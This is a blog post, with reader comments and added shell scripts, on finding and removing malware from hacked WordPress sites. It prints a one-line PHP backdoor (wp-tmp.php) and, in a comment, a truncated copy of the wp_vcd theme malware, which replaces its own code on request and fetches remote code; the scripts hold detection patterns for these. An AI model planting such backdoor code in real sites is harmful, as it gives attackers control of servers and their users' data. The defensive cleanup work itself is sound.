In January, one of my websites was hacked. The symptom was that when I accessed the website, it only showed a white screen in the browser. I didn’t pay much attention to it and just restored the whole website from an earlier backup. However, that was just the beginning of the nightmare. After one month, all my websites on the same shared hosting were hacked. Now it had become a serious problem, and two of my websites were already marked as “Malware code injection”. That is when my journey of cleaning hacked WordPress websites began.
How to Clean Hacked WordPress Website
All the hacked websites are powered by WordPress. I think it will be very helpful if I share my experience of how to find the hacked files in a WordPress website. There are several steps to find the hack code and clean a hacked WordPress website.
Find Suspicious Files in WordPress Website
Step 1 in cleaning a hacked WordPress website is finding all the suspicious files in it. If you are familiar with WordPress, this is easy. If you are not, download the latest version of WordPress and compare its files with those of your hacked website: any file that is not part of the clean release, or whose contents differ from it, deserves a look. In my website, I found a file named “wp-tmp.php” in the root folder. This is the most common way hackers hide their backdoor script.
Suspicious file wp-tmp.php in Hacked WordPress Website
“wp-tmp.php” looks very similar to other WordPress files, such as “wp-login.php” and “wp-settings.php”. However, “wp-tmp.php” is definitely a backdoor: hackers use this file to access your WordPress website and inject malware. It takes whatever is sent in the “m” request parameter, base64-decodes it and runs it as PHP, so anyone who knows the parameter name can execute arbitrary code on your server. The “wp-tmp.php” looks like this:
<?php $p = $_REQUEST["m"]; eval(base64_decode($p)); ?>
Backdoor in WordPress Uploads Folder
Step 2 in cleaning a hacked WordPress website is searching for harmful code in the uploads folder. The “wp-content/uploads” folder is another place where hackers like to put their malware. Because the uploads folder contains all the media files we have uploaded to our website, we will not delete it when we clean the hacked website, and attackers count on that. So when you are cleaning a hacked WordPress site, you must search this folder for PHP files: it should contain only media, so any “.php” file inside it is suspect.
Clean a Hacked WordPress Site in 5 Minutes
Step 3 in cleaning a hacked WordPress site is deleting all the hacked files. After I found all the suspicious files in the hacked WordPress website, simply deleting them was not enough. Many hackers modify WordPress system files to inject harmful code, and this type of hacked file is very hard to find and clean. So the best way to clean your hacked WordPress website is to delete all the WordPress system files, after backing up the “wp-content” folder and the “wp-config.php” file in the root folder.
Restore Clean WordPress System Files
Step 4 is restoring the WordPress system files. This step is simple: I downloaded the latest WordPress source code from wordpress.org (download it there directly, not from a copy on the compromised server) and copied all the WordPress files to my website. Remember to upload your own “wp-content” folder and “wp-config.php” file, which you backed up in step 3.
Stop WordPress Cron Job
Step 5 is stopping the cron job in WordPress. Though this step may not be necessary, it is better for keeping your website safe. In my experience of cleaning hacked WordPress sites, some sophisticated hackers hide their injection code in the database and use the WordPress cron job to run that harmful code, so your WordPress website gets hacked again.
To stop the cron job in WordPress, add this line to the “wp-config.php” file, above the line that loads wp-settings.php (constants defined after that line are ignored):
define('DISABLE_WP_CRON', true);
Another way to stop the cron job is to rename the “wp-cron.php” file or delete it. On my website, I took both of the above actions. Keep in mind that WP-Cron also runs legitimate scheduled tasks (scheduled posts, update checks, plugin jobs), so plan to re-enable it, or trigger it from a real system cron, once the site is clean.
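The five steps above as one runnable script. This is an added example, not code from the original post: audit_site compares the site against a freshly unpacked WordPress release (step 1), lists PHP files under wp-content/uploads (step 2), and greps the whole tree for the eval(base64_decode(...)) pattern of the wp-tmp.php backdoor and for the wp_vcd / theme_temp_setup / go.pub2srv.com names that appear in the functions.php dump in the comments below; rebuild_site backs up wp-content and wp-config.php, replaces everything else with the clean release and stops WP-Cron (steps 3 to 5). The paths used in the usage comment are hypothetical, and the clean tree is assumed to have been downloaded from wordpress.org rather than copied from the compromised host.

```shell
#!/bin/sh
# Added example (not the post's own code). Assumed layout:
#   CLEAN  = an unpacked WordPress release downloaded from wordpress.org
#   SITE   = the web root of the hacked site
#   BACKUP = an empty directory outside the web root

# Step 1: files present in the site but absent from the clean release, and core
# files whose contents differ from it. wp-content and wp-config.php are skipped
# here because they are legitimately site-specific; they are covered below.
audit_core() {
  clean="$1"; site="$2"
  ( cd "$site" && find . -type f ! -path './wp-content/*' ! -name 'wp-config.php' ) |
  while IFS= read -r f; do
    if [ ! -f "$clean/$f" ]; then
      printf 'EXTRA   %s\n' "${f#./}"
    elif ! cmp -s "$clean/$f" "$site/$f"; then
      printf 'CHANGED %s\n' "${f#./}"
    fi
  done
}

# Step 2: the uploads folder should hold media only, so any PHP there is suspect.
audit_uploads() {
  site="$1"
  find "$site/wp-content/uploads" -type f \
    \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' \) 2>/dev/null |
  while IFS= read -r f; do printf 'PHP-IN-UPLOADS %s\n' "${f#"$site"/}"; done
}

# Obfuscation markers and the names seen in this thread, searched across the
# whole tree, themes and plugins included (that is where the comments found the
# wp_vcd code).
audit_patterns() {
  site="$1"
  grep -rlE 'eval[[:space:]]*\([[:space:]]*(base64_decode|gzinflate|str_rot13)' "$site" 2>/dev/null |
  while IFS= read -r f; do printf 'OBFUSCATED %s\n' "${f#"$site"/}"; done
  grep -rlE 'wp_vcd|theme_temp_setup|go\.pub2srv\.com' "$site" 2>/dev/null |
  while IFS= read -r f; do printf 'NAMED-IOC %s\n' "${f#"$site"/}"; done
}

audit_site() { audit_core "$1" "$2"; audit_uploads "$2"; audit_patterns "$2"; }

# Steps 3-5: keep wp-content and wp-config.php, replace every other file with
# the clean release, then stop WP-Cron both ways the post describes.
rebuild_site() {
  clean="$1"; site="$2"; backup="$3"
  # refuse to wipe anything that does not look like a WordPress root
  [ -n "$site" ] && [ -d "$site/wp-includes" ] && [ -f "$site/wp-config.php" ] || return 1
  mkdir -p "$backup"
  cp -R "$site/wp-content" "$backup/wp-content"
  cp "$site/wp-config.php" "$backup/wp-config.php"
  rm -rf "$site" && mkdir -p "$site"
  cp -R "$clean"/. "$site"/
  rm -rf "$site/wp-content"
  cp -R "$backup/wp-content" "$site/wp-content"
  cp "$backup/wp-config.php" "$site/wp-config.php"
  # the define must come before wp-settings.php is loaded, or WordPress ignores it
  awk -v def="define('DISABLE_WP_CRON', true);" '
    /wp-settings\.php/ && !done { print def; done = 1 }
    { print }
    END { if (!done) print def }
  ' "$site/wp-config.php" > "$site/wp-config.php.new" &&
  mv "$site/wp-config.php.new" "$site/wp-config.php"
  rm -f "$site/wp-cron.php"
}

# usage (hypothetical paths):
#   audit_site   /tmp/wordpress /var/www/site
#   rebuild_site /tmp/wordpress /var/www/site /root/wp-backup
```

Run audit_site first and keep its output: the rebuild only replaces core files, so everything it reports under PHP-IN-UPLOADS, OBFUSCATED or NAMED-IOC inside wp-content (uploads, themes, plugins) is restored untouched from the backup and has to be cleaned by hand, which is exactly where the commenters below found the code that kept recreating wp-tmp.php.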
Ask Google to Review Your Website
If your hacked website has already been marked as a malware website by Google, you have to ask Google to review it. First, register your site with Google Webmaster Tools (today’s Search Console). For more information, check this official Google document:
About malware, hacking, and infected sites
Prevent Your Website Being Hacked
After you have cleaned the hacked WordPress site successfully, you should keep watching the website for at least 2 or 3 days. Hackers will try their best to hack your website again once they find they have lost control of it. Therefore, it is very important to check the raw access log of your website. If your website is hacked again, the log will at least show you where the hackers walked in; then you just repeat the above steps and close the backdoor. Keep watching the access log until there is no more suspicious access. Here is an example from my raw access log. The website was hacked again after I had cleaned it, so I deleted all the WordPress system files and stopped the WordPress cron job.
Avoid Brute Force Login
A brute force attack is the most common way to hack a website to get the username and password. Lots of people use brute force attack web services against WordPress-powered websites to get the admin username and password. Here is how it looks in the access log:
To keep our website safe, we must take some actions to protect it. Here is an article about how to avoid brute force attacks on the login page.
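A way to do the access-log watching described above, and to spot the login brute-force pattern from the previous paragraph, without reading the raw file by eye. This is an added example, not the post’s own log or tooling. The log lines written by write_sample_log are constructed in Apache combined format with documentation-range addresses; the backdoor file names come from this page, and the threshold of 10 login POSTs per address is an arbitrary assumption.

```shell
#!/bin/sh
# Added example (not from the original post). Reads a combined-format access log
# and prints two kinds of findings:
#   BACKDOOR-PROBE  any request, even one answered 404, for a file name this page
#                   ties to the infection (the post saw the attacker probe
#                   wp-tmp.php and get 404s shortly before the file reappeared)
#   BRUTE-FORCE     addresses that POST to wp-login.php or xmlrpc.php at least
#                   $2 times (default 10, an assumed threshold)
audit_access_log() {
  log="$1"; threshold="${2:-10}"
  awk -v thr="$threshold" '
    {
      ip = $1
      # combined format: $6 is "\"METHOD", $7 the request target, $9 the status
      method = substr($6, 2); path = $7; status = $9
      sub(/[?].*/, "", path)          # drop the query string
      if (path ~ /\/(wp-tmp|wp-feed|wp-vcd)\.php$/)
        printf "BACKDOOR-PROBE %s %s %s %s\n", ip, method, path, status
      if (method == "POST" && path ~ /\/(wp-login|xmlrpc)\.php$/)
        posts[ip]++
    }
    END {
      for (ip in posts)
        if (posts[ip] >= thr)
          printf "BRUTE-FORCE %s %d login posts\n", ip, posts[ip]
    }
  ' "$log"
}

# Constructed sample log (documentation-range IPs, not real traffic): one probe
# for the backdoor name answered 404, twelve login POSTs from one address, two
# from another, and one ordinary page view.
write_sample_log() {
  out="$1"; : > "$out"
  printf '%s\n' '203.0.113.5 - - [12/Jan/2019:10:00:01 +0000] "GET /wp-tmp.php?m=abc HTTP/1.1" 404 512 "-" "Mozilla/5.0"' >> "$out"
  i=0
  while [ $i -lt 12 ]; do
    printf '%s\n' '203.0.113.9 - - [12/Jan/2019:10:00:02 +0000] "POST /wp-login.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"' >> "$out"
    i=$((i + 1))
  done
  printf '%s\n' '203.0.113.10 - - [12/Jan/2019:10:01:00 +0000] "POST /wp-login.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"' >> "$out"
  printf '%s\n' '203.0.113.10 - - [12/Jan/2019:10:01:05 +0000] "POST /xmlrpc.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"' >> "$out"
  printf '%s\n' '198.51.100.7 - - [12/Jan/2019:10:02:00 +0000] "GET /about/ HTTP/1.1" 200 8192 "-" "Mozilla/5.0"' >> "$out"
}

# demo on the constructed data; on a real host point audit_access_log at the
# raw access log instead, e.g. audit_access_log /var/log/apache2/access.log
f=$(mktemp) && write_sample_log "$f" && audit_access_log "$f"; rm -f "$f"
```

A 404 for wp-tmp.php is the interesting line, not the boring one: it means someone already knows the backdoor name and is checking whether it is back, which is the early warning the post describes.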
Delete Unknown Account
What’s the simplest backdoor in a hacked website? The answer is an administrator account. That’s right: please don’t forget to check whether there are unusual accounts in your website. It is very simple to check. Just go to your website backend and look at the account list. Delete all the accounts you don’t need.
Change Your Administrator Password
When your website is compromised, your username and password may already have leaked. In my hacked WordPress website, the file “wp-includes/user.php” was injected with hack code. I guess this injected code captured the plaintext username and password whenever we logged in. Therefore, the last step in cleaning up your website is changing your administrator password. Since the attackers had file access, treat the database password in “wp-config.php” as leaked too, and regenerate the authentication keys and salts in that file so that any login cookies they captured stop working.
Seems like one of my clients has the same problem, with the same attacker (at least the IP came from the same network, HostSailor NL).
Oh, really. In my website, the hacker left lots of PHP files in the wp-includes folder and the wp-admin folder. All these hack files have names like “edit_.php”, “user_.php”.
So what was your back door? You never do mention how they got the wp-tmp.php file on your machine in the first place.
I guess the back door may be in the cron job in the database, as my website was hacked again even after I replaced all WP files with fresh ones.
I watched the log file. At the beginning, the hacker tried to access wp-tmp.php and got a 404 error. Once my website ran the WordPress cron job, the hacker’s wp-tmp.php was back.
So I guess the hacker injected the hack code into the cron job in WordPress, so I disabled the WordPress cron job and deleted the cron script completely.
Currently, my website is running, but I can still see hackers trying to break it. Quite scary.
I have a Dragon Touch E70 tablet. I can not open it because there is a message that the adulate browser has stopped, so it prevents me from continuing to open the tablet. I had tried many times to reset the device to factory settings and tried to format it, but it is the same: the device is locked. Please help.
You’d better contact customer support. I have never met this problem.
Hello, I have similar problems. Even if I delete the 2 files wp-tmp.php and wp-feed.php, after one minute they appear again. I don’t want to do
The hacker has already put some backdoor script in your website, which may be hidden in a normal WordPress script or theme script.
I have the same problem, the files regenerate automatically.
I tried to clean the files by reinstalling the wp-includes and wp-admin folders.
I also deleted the wp-cron.php file.
Can’t find a solution right now. Did you?
It’s highly possible the hacking code is hiding in a plugin file or theme file. That’s why all the problem files are regenerated automatically. Last time, I found the malware code in my theme file.
Since I can’t recognize and find the malware, I will have to delete everything and make a new install of WordPress, theme and every single plugin from a fresh install.
I found a temporary solution to stop the scripts recreating themselves. I created 2 new files named “wp-tmp.php” and “wp-feed.php” with no code inside. Then I deleted the 2 respective files in my server folder, and quickly uploaded my 2 files to the same folder so that they can’t be recreated by the malware since they already exist.
I found the solution: look for functions.php in your theme folder. Open it and delete the first part of the code, which is the hacked part.
(also google the word “go.pub2srv.com” to find more solutions)
This is the code:
<?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '35160fd9ce44b4c2a1c074cd994bf65a'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain))
{
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
case 'change_code';
if (isset($_REQUEST['newcode']))
{
if (!empty($_REQUEST['newcode']))
{
if ($file = @file_get_contents(__FILE__))
{
if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode))
{
$file = str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);
@file_put_contents(__FILE__, $file);
print "true";
}
}
}
}
break;
default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
}
die("");
}
$div_code_name = "wp_vcd";
$funcfile = __FILE__;
if(!function_exists('theme_temp_setup')) {
$path = $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];
if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
function file_get_contents_tcurl($url)
{
$ch = curl_init();
curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
curl_setopt($ch, CURLOPT_HEADER, 0);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}
function theme_temp_setup($phpCode)
{
$tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
$handle = fopen($tmpfname, "w+");
fwrite($handle, "<?php
Thank you so much, it works.
Also look in the database for “wp-tmp” and you’ll find some other strings in the options table to remove.
Your experience will be greatly helpful!!!
Thanks for the solution!
This occurs by using NULLED themes and plugins.
You have to know that everything nulled is contaminated by malicious code.
When a nulled theme or plugin is installed, the code wakes up at a certain moment, goes through all the folders of your hosting, and installs a script in addition to adding several files:
wp-vcd.php
wp-tmp.php
AND ALSO modifies
post.php
functions.php